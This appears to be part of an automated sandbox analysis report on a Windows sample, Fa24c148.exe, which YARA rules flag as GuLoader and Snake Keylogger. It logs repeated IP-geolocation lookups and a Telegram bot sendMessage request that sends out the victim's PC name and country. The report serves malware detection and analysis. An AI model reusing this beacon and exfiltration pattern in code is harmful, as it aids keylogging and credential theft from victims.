                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=956&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2811650&cwnd=251&unsent_bytes=0&cid=d6119aee547b4382&ts=147&x=0"
                                                                                                  2024-10-28 11:22:37 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                                                                                  Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  4192.168.2.449742188.114.97.34431440C:\Users\user\Desktop\Fa24c148.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-10-28 11:22:39 UTC87OUTGET /xml/155.94.241.188 HTTP/1.1
                                                                                                  Host: reallyfreegeoip.org
                                                                                                  Connection: Keep-Alive
                                                                                                  2024-10-28 11:22:39 UTC886INHTTP/1.1 200 OK
                                                                                                  Date: Mon, 28 Oct 2024 11:22:39 GMT
                                                                                                  Content-Type: text/xml
                                                                                                  Content-Length: 358
                                                                                                  Connection: close
                                                                                                  apigw-requestid: AVhc-iOyPHcEJSw=
                                                                                                  Cache-Control: max-age=86400
                                                                                                  CF-Cache-Status: HIT
                                                                                                  Age: 37190
                                                                                                  Last-Modified: Mon, 28 Oct 2024 01:02:49 GMT
                                                                                                  Accept-Ranges: bytes
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mgA3zLx2%2BBG0it7w6RtP8Xo99Yjfy3z2Y1N0s61ObtCaxaW8c6vBPU772m4fH%2BB64VajDq2GJ4lJGr5uFXHmEVXOfbS8aw8rJg%2BxdGO1%2F%2BvOSOM7WFUjWSUtOVZBtGWjx53Oh1ej"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8d9a8c9a5a7e2851-DFW
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1369&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2078966&cwnd=251&unsent_bytes=0&cid=2990fefa9f65b490&ts=146&x=0"
                                                                                                  2024-10-28 11:22:39 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                                                                                  Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  5192.168.2.449744188.114.97.34431440C:\Users\user\Desktop\Fa24c148.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-10-28 11:22:40 UTC87OUTGET /xml/155.94.241.188 HTTP/1.1
                                                                                                  Host: reallyfreegeoip.org
                                                                                                  Connection: Keep-Alive
                                                                                                  2024-10-28 11:22:41 UTC886INHTTP/1.1 200 OK
                                                                                                  Date: Mon, 28 Oct 2024 11:22:41 GMT
                                                                                                  Content-Type: text/xml
                                                                                                  Content-Length: 358
                                                                                                  Connection: close
                                                                                                  apigw-requestid: AVhc-iOyPHcEJSw=
                                                                                                  Cache-Control: max-age=86400
                                                                                                  CF-Cache-Status: HIT
                                                                                                  Age: 37192
                                                                                                  Last-Modified: Mon, 28 Oct 2024 01:02:49 GMT
                                                                                                  Accept-Ranges: bytes
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wM%2BEu2T6YRBQkuspPAsuRfSF4Td1duwr2XOOvS40jYe3hBmciXIyrLnGOynDcUQDzYtrc6hyJQ%2BybOrsGg9Vzn%2FdoF0YFTCiTYuW4ua8BIGYKvKPuMaho7J7YlXy%2BbtOdO7Y%2BZ0P"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8d9a8ca63e036bdd-DFW
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1168&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2450084&cwnd=251&unsent_bytes=0&cid=ab574f16bad97cd2&ts=367&x=0"
                                                                                                  2024-10-28 11:22:41 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                                                                                  Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  6192.168.2.449746188.114.97.34431440C:\Users\user\Desktop\Fa24c148.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-10-28 11:22:42 UTC63OUTGET /xml/155.94.241.188 HTTP/1.1
                                                                                                  Host: reallyfreegeoip.org
                                                                                                  2024-10-28 11:22:42 UTC878INHTTP/1.1 200 OK
                                                                                                  Date: Mon, 28 Oct 2024 11:22:42 GMT
                                                                                                  Content-Type: text/xml
                                                                                                  Content-Length: 358
                                                                                                  Connection: close
                                                                                                  apigw-requestid: AVhc-iOyPHcEJSw=
                                                                                                  Cache-Control: max-age=86400
                                                                                                  CF-Cache-Status: HIT
                                                                                                  Age: 37193
                                                                                                  Last-Modified: Mon, 28 Oct 2024 01:02:49 GMT
                                                                                                  Accept-Ranges: bytes
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NR0c8RUNWYFNvSppELqMhBfLsAUUAjMq6YRDxZZqG3l8SYjz6s5Cg7EoTBPiQZMUjxXID6qo1wK8hFVsMP4VE%2Fl9palUsWvpRzyjYlqBsxilGPN835OzYzneVBzVpEddcjIY5Wuh"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8d9a8cb07ae346d8-DFW
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1015&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2724365&cwnd=248&unsent_bytes=0&cid=3250173afbdeff01&ts=150&x=0"
                                                                                                  2024-10-28 11:22:42 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                                                                                  Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  7192.168.2.449749188.114.97.34431440C:\Users\user\Desktop\Fa24c148.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-10-28 11:22:44 UTC87OUTGET /xml/155.94.241.188 HTTP/1.1
                                                                                                  Host: reallyfreegeoip.org
                                                                                                  Connection: Keep-Alive
                                                                                                  2024-10-28 11:22:44 UTC895INHTTP/1.1 200 OK
                                                                                                  Date: Mon, 28 Oct 2024 11:22:44 GMT
                                                                                                  Content-Type: text/xml
                                                                                                  Content-Length: 358
                                                                                                  Connection: close
                                                                                                  apigw-requestid: AVhc-iOyPHcEJSw=
                                                                                                  Cache-Control: max-age=86400
                                                                                                  CF-Cache-Status: HIT
                                                                                                  Age: 37195
                                                                                                  Last-Modified: Mon, 28 Oct 2024 01:02:49 GMT
                                                                                                  Accept-Ranges: bytes
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=juuv%2BKc67OB1t5TK1VmJ7QgQanLT3VpX%2B1Ee7pjej2yFdRsEe2mLgdyRwt%2BOUo%2BmcE%2BFtIi1MFcypD%2FOecIjYmpFlrIJp%2FqBvL8sFOgKktCVKeKVD%2F%2FIoO2Ysreu%2BgCvLaPc047H"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8d9a8cbaec066bba-DFW
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=972&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=3001036&cwnd=251&unsent_bytes=0&cid=9f4cb2e8cdfbc589&ts=146&x=0"
                                                                                                  2024-10-28 11:22:44 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                                                                                  Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  8192.168.2.449751188.114.97.34431440C:\Users\user\Desktop\Fa24c148.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-10-28 11:22:45 UTC87OUTGET /xml/155.94.241.188 HTTP/1.1
                                                                                                  Host: reallyfreegeoip.org
                                                                                                  Connection: Keep-Alive
                                                                                                  2024-10-28 11:22:46 UTC884INHTTP/1.1 200 OK
                                                                                                  Date: Mon, 28 Oct 2024 11:22:46 GMT
                                                                                                  Content-Type: text/xml
                                                                                                  Content-Length: 358
                                                                                                  Connection: close
                                                                                                  apigw-requestid: AVhc-iOyPHcEJSw=
                                                                                                  Cache-Control: max-age=86400
                                                                                                  CF-Cache-Status: HIT
                                                                                                  Age: 37197
                                                                                                  Last-Modified: Mon, 28 Oct 2024 01:02:49 GMT
                                                                                                  Accept-Ranges: bytes
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LGdlFVZxRWUyJrEXjFFWiRAYTUBaYxPHRLb%2F%2BnTan0sVKp%2F7qn2Djjype9AiMIzpeBHaSxCBiWI50D5ZSoLw9EqwVY2zn2ESIJaIMxhPR66%2Bwle4IBDcKgk1dJtl9xcFo5jhgeAK"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8d9a8cc5ba946c14-DFW
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1730&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=1642654&cwnd=251&unsent_bytes=0&cid=fa3b4da8b7ab8ba3&ts=216&x=0"
                                                                                                  2024-10-28 11:22:46 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                                                                                  Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  9192.168.2.449754188.114.97.34431440C:\Users\user\Desktop\Fa24c148.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-10-28 11:22:47 UTC87OUTGET /xml/155.94.241.188 HTTP/1.1
                                                                                                  Host: reallyfreegeoip.org
                                                                                                  Connection: Keep-Alive
                                                                                                  2024-10-28 11:22:47 UTC884INHTTP/1.1 200 OK
                                                                                                  Date: Mon, 28 Oct 2024 11:22:47 GMT
                                                                                                  Content-Type: text/xml
                                                                                                  Content-Length: 358
                                                                                                  Connection: close
                                                                                                  apigw-requestid: AVhc-iOyPHcEJSw=
                                                                                                  Cache-Control: max-age=86400
                                                                                                  CF-Cache-Status: HIT
                                                                                                  Age: 37198
                                                                                                  Last-Modified: Mon, 28 Oct 2024 01:02:49 GMT
                                                                                                  Accept-Ranges: bytes
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BFAfYxIXVHdURDZwKpG4KymBZUSszMt6AlHUl6To150aC0MFAo6knwmdtPSd%2Fo9Tm22TxurS4Qb1z2vxRu7IEu1Zw8rAV7FrnR9XPZQTkbntVtviJTXyFWGQjChGmGC%2FgU4HlL%2F4"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8d9a8cd14f57485c-DFW
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1189&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2479452&cwnd=248&unsent_bytes=0&cid=271bdbb678565df1&ts=145&x=0"
                                                                                                  2024-10-28 11:22:47 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                                                                                  Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  10192.168.2.449766188.114.97.34431440C:\Users\user\Desktop\Fa24c148.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-10-28 11:22:49 UTC87OUTGET /xml/155.94.241.188 HTTP/1.1
                                                                                                  Host: reallyfreegeoip.org
                                                                                                  Connection: Keep-Alive
                                                                                                  2024-10-28 11:22:49 UTC882INHTTP/1.1 200 OK
                                                                                                  Date: Mon, 28 Oct 2024 11:22:49 GMT
                                                                                                  Content-Type: text/xml
                                                                                                  Content-Length: 358
                                                                                                  Connection: close
                                                                                                  apigw-requestid: AVhc-iOyPHcEJSw=
                                                                                                  Cache-Control: max-age=86400
                                                                                                  CF-Cache-Status: HIT
                                                                                                  Age: 37200
                                                                                                  Last-Modified: Mon, 28 Oct 2024 01:02:49 GMT
                                                                                                  Accept-Ranges: bytes
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0%2FxqqmBNP9mXE2pU7E4klIT20sjdXziYWl5%2Buegqxidnenm69gkwW1dksZeVqkW5nn44ni2K5mhqgdxFKTHwyQQEoJy35Cr8qqvwhOUU1bl72lZQ9bhvvdFA5yXmBC%2FLQ9OAWXzR"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8d9a8cdc1989e7bf-DFW
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2038&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=1375771&cwnd=251&unsent_bytes=0&cid=1533368edcf935b7&ts=235&x=0"
                                                                                                  2024-10-28 11:22:49 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                                                                                  Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  11192.168.2.449772149.154.167.2204431440C:\Users\user\Desktop\Fa24c148.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-10-28 11:22:50 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:888683%0D%0ADate%20and%20Time:%2028/10/2024%20/%2022:44:07%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20888683%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                  Host: api.telegram.org
                                                                                                  Connection: Keep-Alive
                                                                                                  2024-10-28 11:22:50 UTC344INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.18.0
                                                                                                  Date: Mon, 28 Oct 2024 11:22:50 GMT
                                                                                                  Content-Type: application/json
                                                                                                  Content-Length: 55
                                                                                                  Connection: close
                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                  Access-Control-Allow-Origin: *
                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                  2024-10-28 11:22:50 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                  Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                  Click to jump to process

                                                                                                  Click to jump to process

                                                                                                  Click to dive into process behavior distribution

                                                                                                  Click to jump to process

                                                                                                  Target ID:0
                                                                                                  Start time:07:21:46
                                                                                                  Start date:28/10/2024
                                                                                                  Path:C:\Users\user\Desktop\Fa24c148.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\Desktop\Fa24c148.exe"
                                                                                                  Imagebase:0x400000
                                                                                                  File size:1'005'202 bytes
                                                                                                  MD5 hash:7644EBBF786053FFAF95DBE86B7DE5D4
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2029869938.0000000005425000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  Target ID:4
                                                                                                  Start time:07:22:22
                                                                                                  Start date:28/10/2024
                                                                                                  Path:C:\Users\user\Desktop\Fa24c148.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\Desktop\Fa24c148.exe"
                                                                                                  Imagebase:0x400000
                                                                                                  File size:1'005'202 bytes
                                                                                                  MD5 hash:7644EBBF786053FFAF95DBE86B7DE5D4
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.2951440746.00000000335C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2951440746.00000000336C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  Reputation:low
                                                                                                  Has exited:false

                                                                                                  Reset < >

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:20.1%
                                                                                                    Dynamic/Decrypted Code Coverage:15%
                                                                                                    Signature Coverage:18.2%
                                                                                                    Total number of Nodes:1529
                                                                                                    Total number of Limit Nodes:49
